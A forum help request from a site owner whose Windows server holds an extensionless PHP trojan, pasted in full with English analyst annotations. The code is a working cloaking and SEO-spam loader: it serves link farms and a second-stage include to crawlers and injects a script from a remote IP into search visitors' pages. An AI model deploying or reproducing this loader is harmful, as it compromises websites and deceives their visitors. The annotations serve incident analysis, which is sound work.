x3.4 服务器 C:\ProgramData\app\app 文件,无扩展名木马
删除这个目录后就不能打开网站;请问如何解决?谢谢!!
打开文件内容如下:
<?php
// Analyst summary (from the code in this listing): this is a search-engine cloaking /
// SEO-spam loader. Requests whose User-Agent looks like a crawler get content produced
// by a second-stage file (app.txt) or a page of generated links; visitors who arrive
// from a search-engine result get a remote <script> injected; everyone else gets nothing
// from this file.
// NOTE(review): the post says the site stops loading once this directory is deleted. That
// suggests some site file or PHP setting (include/require, or auto_prepend_file) still
// references it - not visible here. Find and remove that reference, and treat the
// directory contents as indicators rather than only deleting them.

// Output is buffered and gzip-encoded; error display is turned off, so failures in this
// script do not show up in the served page.
ob_start("ob_gzhandler");
ini_set('html_errors', false);
ini_set('display_errors', false);
define("APP_INCLUDE_FLAG", "TRUE");
define('APP_JACK_CHARSET', 'GBK');
header("Content-type: text/html; charset=" . APP_JACK_CHARSET);
// Hard-coded data directory holding keyword lists, templates and the second stage.
define('APP_JACK_DOCUMENTROOT', 'C:/ProgramData/app/');
// Template selection is keyed on the request's User-Agent string.
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (stristr($userAgent, "sogou")) {
define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'key/' . rand(1, 10) . '.txt');
define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'sogou/mb' . mt_rand(1, 4) . '.txt');
define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'bl/bl1.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl/bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl/bl3.txt');
}
// This is a separate if/else, not an elseif of the "sogou" test: for a Sogou User-Agent
// the else branch below runs as well. define() does not overwrite an existing constant,
// so the values set in the "sogou" block stay in effect.
if (stristr($userAgent, "baidu")) {
define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'key/' . rand(1, 10) . '.txt');
define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'baidu/mb' . mt_rand(1, 4) . '.txt');
define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'bl/bl1.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl/bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl/bl3.txt');
} else {
define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'key/' . rand(1, 10) . '.txt');
define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'mb.txt'); // Haosou template
define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'bl/bl1.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl/bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl/bl3.txt');
}
// The constants below are not read anywhere in this listing; presumably they are consumed
// by the included second stage (APP_JACK_APPFILE) - confirm against that file.
define('APP_JACK_QQ', APP_JACK_DOCUMENTROOT . 'Oicq.txt');
define('APP_JACK_ARTICLE', APP_JACK_DOCUMENTROOT . 'txt/txt' . rand(1, 10) . '.txt');
define('APP_JACK_DES', APP_JACK_DOCUMENTROOT . 'MiaoShu.txt');
// Both constants were already defined on every path above, so these two calls leave the
// earlier 'bl/bl2.txt' and 'bl/bl3.txt' values unchanged.
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bl2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bl3.txt');
define('APP_MIX_KWD_FILE', APP_JACK_DOCUMENTROOT . 'HunHe.txt');
define('APP_JACK_CACHED', 'Uncached');
define('APP_JACK_MIN_PAR', '3');
define('APP_JACK_MAX_PAR', '3');
define('APP_JACK_MIN', '10');
define('APP_JACK_MAX', '15');
// Second-stage file: missclient::run() pulls it in with include, so it executes as PHP
// despite the .txt extension. Its contents are not part of this listing.
define('APP_JACK_APPFILE', APP_JACK_DOCUMENTROOT . 'app.txt');
/**
 * Returns one randomly chosen forum-style URL on the current host with a random numeric id.
 *
 * The host part comes from the request's Host header ($_SERVER['HTTP_HOST']). The ids for
 * gid/tid/fid start at 5000000, which is the range missclient::run() tests in its
 * $_GET check, so a crawler following these links is routed back into this script.
 * Both branches of the "baiduspider" test build the same 22-entry list.
 *
 * @return string absolute http:// URL
 */
function App_GetLink()
{
$userAgentx = strtolower($_SERVER['HTTP_USER_AGENT']);
if (stristr($userAgentx, "baiduspider")) {
$link = array();
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/thread-' . mt_rand(5000000, 99999999999.0) . '-1-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum-' . mt_rand(5000000, 99999999999.0) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/article-' . mt_rand(10000, 9999999999) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=redirect&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=viewthread&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=forumdisplay&fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=collection&action=view&ctid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
return $link[mt_rand(0, count($link) - 1)];
} else {
// Same list as the branch above.
$link = array();
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/thread-' . mt_rand(5000000, 99999999999.0) . '-1-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum-' . mt_rand(5000000, 99999999999.0) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/article-' . mt_rand(10000, 9999999999) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=redirect&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=viewthread&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=forumdisplay&fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=collection&action=view&ctid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?fid=' . mt_rand(5000000, 99999999999.0) . '';
return $link[mt_rand(0, count($link) - 1)];
}
}
/**
 * Returns one randomly chosen forum-style URL on the current host, from a 16-entry list.
 *
 * Same construction as App_GetLink() (Host header plus a random numeric id) with a
 * slightly different set of path patterns. Not called anywhere in this listing;
 * presumably used by the included second stage - confirm against that file.
 *
 * @return string absolute http:// URL
 */
function App_GetSelf()
{
$link = array();
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/thread-' . mt_rand(5000000, 99999999999.0) . '-1-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum-' . mt_rand(5000000, 99999999999.0) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/article-' . mt_rand(10000, 9999999999) . '-1.html';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/home.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/portal.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=redirect&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=viewthread&tid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=forumdisplay&fid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/forum.php?mod=collection&action=view&ctid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?gid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?mid=' . mt_rand(5000000, 99999999999.0) . '';
$link[] = 'http://' . $_SERVER['HTTP_HOST'] . '/index.php?id=' . mt_rand(5000000, 99999999999.0) . '';
return $link[mt_rand(0, count($link) - 1)];
}
/**
 * Returns the URL of one randomly chosen image on the third-party host i.niupic.com.
 *
 * The list holds 31 file-name stems and the index is drawn from 0..30. Not called in
 * this listing; presumably used by the second stage or the templates - confirm.
 *
 * @return string https:// image URL
 */
function getImg()
{
$img_ay = array('5B84', '5B85', '5B8b', '5B8e', '5B88', '5B86', '5B8c', '5B8d', '5B8a', '5B87', '5B89', '5B8f', '5B8g', '5B8i', '5B8m', '5B8l', '5B8n', '5B8d', '5B8o', '5B8j', '5B8h', '5B8k', '5B8p', '5B8q', '5B8r', '5B8u', '5B8t', '5B8v', '5B8s', '5B8B', '5B8y');
$img_num = rand(0, 30);
return "https://i.niupic.com/images/2018/12/09/" . $img_ay[$img_num] . ".jpg";
}
// Entry point: the dispatcher runs as soon as this file is loaded, i.e. on every request
// that includes it. run() may echo output and terminate the request (exit/die) before
// the legitimate site code gets to run.
$my_app = new missclient();
$my_app->run();
/**
 * Request dispatcher of the cloaking script.
 *
 * Decides per request, from the User-Agent, Referer, a cookie and the query string, whether
 * to (a) serve second-stage output to a crawler, (b) print a page of generated links for a
 * crawler, (c) inject a remote script for a visitor coming from a search engine, or
 * (d) do nothing.
 *
 * Indicators visible in this class: script URL http://23.225.194.165:60789/js.js, cookie
 * name "domain-filter-bypass", campaign tag 'cpfwb', cache files named sess_* under
 * C:/windows/temp/ or /tmp/.
 */
class missclient
{
public $show_spider;
// Referer substrings treated as "came from a search engine" (filled in run()).
public $jump_ref;
// Referer substrings that suppress the redirect (filled in run()).
public $http_ref_filter;
public $jump_url = "";
public $domain = "";
public $condition = "";
public $app_server = "";
// Path of a crawler-visit log; empty here, so isSpider() writes no log.
public $log_spider = "";
public $cur_spider = "";
// "|"-separated IP prefixes. Despite the name, isAllowdIp() treats these as excluded.
public $allow_ip = "";
public $isCache = false;
/**
 * Main decision routine; may echo output and end the request.
 */
public function run()
{
$this->domain = 'cpfwb';
$this->jump_ref = explode("|", "baidu.|haoso.|haosou.|bing.|sogou.|m.sogou.|wap.sogou.|soso.|so.com|.sm.cn");
// Referers containing site: / inurl: search operators are never redirected (see isRef()).
$this->http_ref_filter = explode("|", "inurl:|site:|site%3A|inurl%3A");
$this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
if (stristr(strtolower($_SERVER['HTTP_USER_AGENT']), "360spider") || stristr(strtolower($_SERVER['HTTP_USER_AGENT']), "haosouspider")) {
$this->condition = $this->isAllowdIp();
} else {
// && binds tighter than ||, so the IP check only gates the gid term; a tid or fid
// above 5000000 satisfies the condition on its own. These are the id ranges that
// App_GetLink() generates.
$this->condition = $_GET['tid'] > 5000000 || $_GET['fid'] > 5000000 || $_GET['gid'] > 5000000 && $this->isAllowdIp();
}
$this->app_server = "app.php";
// Caching is switched off here, so the cache branch below is not reached as configured.
$this->isCache = False;
if ($this->isSpider() && $this->isAllowdIp()) {
if ($this->condition) {
if ($this->isCache) {
$relset_host = $this->getServerName();
// Cache directory: temp dir plus the last 6 hex characters of md5(server name);
// file name: 'sess_' plus md5 of the query string with its first 6 characters dropped.
$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
$cacheFile = $dir . 'sess_' . substr(md5(http_build_query($_GET)), 6);
if (!@file_exists($dir)) {
mkdir($dir, 0777);
}
if (@file_exists($cacheFile) && @filesize($cacheFile) > 32) {
// Cache hit: decode the stored key/value map and substitute {key} markers in the template.
$var = coreAppCache::read($cacheFile);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach ($var as $key => $v) {
$flag = "{" . $key . "}";
$page = str_replace($flag, $v, $page);
}
echo $page;
exit;
} else {
// Cache miss: execute the second stage and use its return value.
$currentPage = (include APP_JACK_APPFILE);
if ($currentPage && strlen($currentPage) > 32 && stristr($currentPage, "</explode>")) {
$var = self::cut($currentPage, "<explode>", "</explode>");
$var = coreAppCache::decode($var);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach ($var as $key => $v) {
$flag = "{" . $key . "}";
$page = str_replace($flag, $v, $page);
}
echo $page;
@coreAppCache::writenocode($currentPage, $cacheFile);
}
}
die;
} else {
// Path taken as configured: app.txt is executed as PHP via include, its return value
// is sent to the crawler, and the request ends before any site code runs.
$currentPage = (include APP_JACK_APPFILE);
echo $currentPage;
die;
}
} else {
// Crawler without a matching id parameter: emit a page of generated links.
$this->_uncondition_hook();
}
} else {
if ($this->isRef() && $this->condition) {
// Visitor arriving from a search engine on one of the generated URLs.
$this->Jump();
} else {
$this->_unSpider_hook();
}
}
}
/**
 * Returns false when the client address contains one of the prefixes in $allow_ip,
 * true otherwise - i.e. the list works as an exclusion list.
 *
 * @return bool
 */
public function isAllowdIp()
{
$ip = $this->clientIp();
$non_list = explode("|", $this->allow_ip);
foreach ($non_list as $iplist) {
if (@stristr($ip, $iplist)) {
return false;
}
}
return true;
}
/**
 * Determines the client address, preferring the client-supplied Client-IP and
 * X-Forwarded-For headers over REMOTE_ADDR.
 *
 * @return string the matched address text, or 'unknown'
 */
public function clientIp()
{
if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
// As posted, the character class holds a literal 'd' and '.', so an ordinary dotted
// IPv4 address does not match and the method yields 'unknown'; the exclusion list in
// isAllowdIp() then never matches. NOTE(review): the same paste shows "rn"/"n" where
// escape sequences would be expected, so the sample on disk may differ - verify.
preg_match("/[d.]{7,15}/", $onlineip, $onlineipmatches);
$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
unset($onlineipmatches);
return $onlineip;
}
/**
 * Reports whether the User-Agent contains one of five crawler tokens and records
 * which one matched in $cur_spider.
 *
 * @return bool
 */
public function isSpider()
{
$bots = array('Baidu' => 'baiduspider', 'Sogou' => 'sogou', 'Haoso' => 'haosouspider', '360spider' => '360spider', 'bingbot' => 'bingbot');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
foreach ($bots as $k => $v) {
if (stristr($userAgent, $v)) {
// Optional visit log; $log_spider is empty in this listing, so nothing is written.
if (!empty($this->log_spider)) {
@file_put_contents($this->log_spider, $v . "->Visited " . $_SERVER['QUERY_STRING'] . "at: " . date("Y-m-d H:i:s") . "n", FILE_APPEND);
}
$this->cur_spider = $k;
return true;
break;
}
}
return false;
}
/**
 * Decides whether the visitor should be redirected, based on cookie, address and Referer.
 *
 * Returns false if the "domain-filter-bypass" cookie is present, if the address is on
 * the exclusion list, or if the Referer contains a site:/inurl: operator; in the last
 * two cases the cookie is set for 259200 seconds (3 days) so the visitor is not
 * redirected later either. Returns true if the Referer contains a search-engine
 * substring. With no match the function ends without a return statement (null).
 *
 * @return bool|null
 */
public function isRef()
{
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if (isset($_COOKIE["domain-filter-bypass"])) {
return false;
}
if (!$this->isAllowdIp()) {
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
foreach ($this->http_ref_filter as $r) {
$r = trim($r);
if (stristr($ref, $r)) {
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
}
foreach ($this->jump_ref as $r) {
$r = trim($r);
if (stristr($ref, $r)) {
return true;
}
}
}
/**
 * Returns the lower-cased SERVER_NAME (or the Host header if that is empty); used in
 * run() to derive the cache directory name.
 *
 * @return string
 */
public function getServerName()
{
$ServerName = strtolower($_SERVER['SERVER_NAME'] ? $_SERVER['SERVER_NAME'] : $_SERVER['HTTP_HOST']);
if (strpos($ServerName, 'http://')) {
return str_replace('http://', '', $ServerName);
}
return $ServerName;
}
/**
 * Builds a request to $app_server carrying the campaign tag, the matched crawler name
 * and the original query string, and fetches it via HttpVisit().
 *
 * Not called anywhere in this listing. $cache is only assigned when $isCache is true.
 *
 * @return string|null|false response body as returned by HttpVisit()
 */
public function getPage()
{
if ($this->isCache) {
$cache = "cached";
}
$url = $this->app_server . "?domain=" . $this->domain . "&gid=199&spider=" . $this->cur_spider . "&cache=" . $cache . "&localPar=" . http_build_query($_GET);
return $this->HttpVisit($url);
}
/**
 * Fetches a URL with whichever transport is available: cURL, then an HTTP stream
 * context, then a raw socket. All calls are @-suppressed, so failures are silent.
 *
 * In this listing it is only reached through getPage().
 *
 * @param string $weburl URL to fetch
 * @return string|null|false fetched data
 */
public function HttpVisit($weburl)
{
$remote_data = NULL;
if (function_exists('curl_exec')) {
$curl = @curl_init();
@curl_setopt($curl, CURLOPT_URL, $weburl);
@curl_setopt($curl, CURLOPT_HEADER, 0);
@curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
@curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$remote_data = @curl_exec($curl);
@curl_close($curl);
} else {
if (function_exists('stream_context_create')) {
$header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
$http_header = @stream_context_create($header_array);
$remote_data = @file_get_contents($weburl, false, $http_header);
} else {
// Raw-socket fallback: host (and optional port after ':') is taken from the URL.
$temp_url = explode("/", $weburl);
$new_url = $temp_url[2];
$http_port = 80;
$get_file = substr($weburl, strlen($new_url) + 7);
if (strstr($new_url, chr(58))) {
$s_var_array['td'] = explode(chr(58), $new_url);
$new_url = $s_var_array['td'][0];
$http_port = $s_var_array['td'][1];
}
$fsock_result = @fsockopen($new_url, $http_port);
// As posted, the separators are the literal strings "rn"/"rnrn", not CR LF.
@fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "rn" . 'Host:' . $new_url . "rn" . 'Connection:Close' . "rnrn");
while (!feof($fsock_result)) {
$remote_data .= fgets($fsock_result, 1024);
}
@fclose($fsock_result);
}
}
return $remote_data;
}
/**
 * Sends the visitor a page consisting only of a <script> tag that loads JavaScript from
 * http://23.225.194.165:60789/js.js, then ends the request.
 *
 * What that script does is not visible here. The address and port are useful for
 * searching proxy/egress logs and for blocking. $domain is computed but not used.
 */
public function Jump()
{
if ($this->isAllowdIp()) {
$domain = str_replace(".", "_", $this->domain);
echo '<script type="text/javascript" src="http://23.225.194.165:60789/js.js"></script>';
// header("HTTP/1.1 200 OK");
exit;
}
}
/**
 * Prints 100 anchors with empty link text, each pointing at a URL from App_GetLink().
 *
 * The links are invisible to a human reader but give a crawler more generated URLs on
 * this host to follow. $array is unused.
 */
public function _uncondition_hook()
{
$array = array();
for ($a = 0; $a < 100; $a++) {
echo '<a href="' . App_GetLink() . '"></a>' . "\n";
}
}
/**
 * Empty hook for ordinary visitors: nothing is output and control returns to the caller.
 */
public function _unSpider_hook()
{
}
/**
 * Returns whether $haystack begins with $needle (loose == comparison).
 * Not called in this listing.
 *
 * @param string $needle
 * @param string $haystack
 * @return bool
 */
public function strStartWith($needle, $haystack)
{
return substr($haystack, 0, strlen($needle)) == $needle;
}
/**
 * Builds a random string of $length characters from 0-9 and a-z using rand().
 * Not called in this listing.
 *
 * @param int $length
 * @return string|null null when $length is 0
 */
public function rndStr($length = 8)
{
$str = null;
$strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
$max = strlen($strPol) - 1;
for ($i = 0; $i < $length; $i++) {
$str .= $strPol[rand(0, $max)];
}
return $str;
}
/**
 * Returns the text between the first occurrence of $from and the next $end.
 *
 * @param string $file text to search
 * @param string $from opening marker
 * @param string $end  closing marker
 * @return string
 */
public function cut($file, $from, $end)
{
$message = explode($from, $file);
$message = explode($end, $message[1]);
return $message[0];
}
}
/**
 * Cache helper for the dispatcher: stores and loads the key/value map that is
 * substituted into the page template.
 *
 * The methods are declared without `static` but are invoked with `::` from
 * missclient::run(). Only read(), decode() and writenocode() are called in this
 * listing, and only on the cache path, which is disabled there ($isCache is false).
 */
class coreAppCache
{
/**
 * Writes encode($file) to $filename.
 *
 * @return int|false result of file_put_contents()
 */
public function write($file, $filename)
{
return file_put_contents($filename, self::encode($file));
}
/**
 * Writes $file to $filename unchanged.
 *
 * @return int|false result of file_put_contents()
 */
public function writenocode($file, $filename)
{
return file_put_contents($filename, $file);
}
/**
 * Loads a cache file, takes the part between <explode> and </explode> if that marker
 * is present, and decodes it.
 *
 * @param string $filename
 * @return mixed the unserialized value
 */
public function read($filename)
{
$content = file_get_contents($filename);
if (stristr($content, "</explode>")) {
$content = self::cut($content, "<explode>", "</explode>");
}
return self::decode($content);
}
/**
 * serialize -> gzcompress -> base64.
 *
 * @return string
 */
public function encode($file)
{
return base64_encode(gzcompress(serialize($file)));
}
/**
 * base64 -> gzuncompress -> unserialize.
 *
 * The input is whatever the cache file or the second stage supplies; unserialize() on
 * data that another local user or process can write is a PHP object-injection risk.
 * The cache directory is created by missclient::run() with mode 0777 under the shared
 * temp directory.
 *
 * @return mixed
 */
public function decode($file)
{
return unserialize(gzuncompress(base64_decode($file)));
}
/**
 * Returns the text between the first occurrence of $from and the next $end
 * (same logic as missclient::cut()).
 *
 * @return string
 */
public function cut($file, $from, $end)
{
$message = explode($from, $file);
$message = explode($end, $message[1]);
return $message[0];
}
}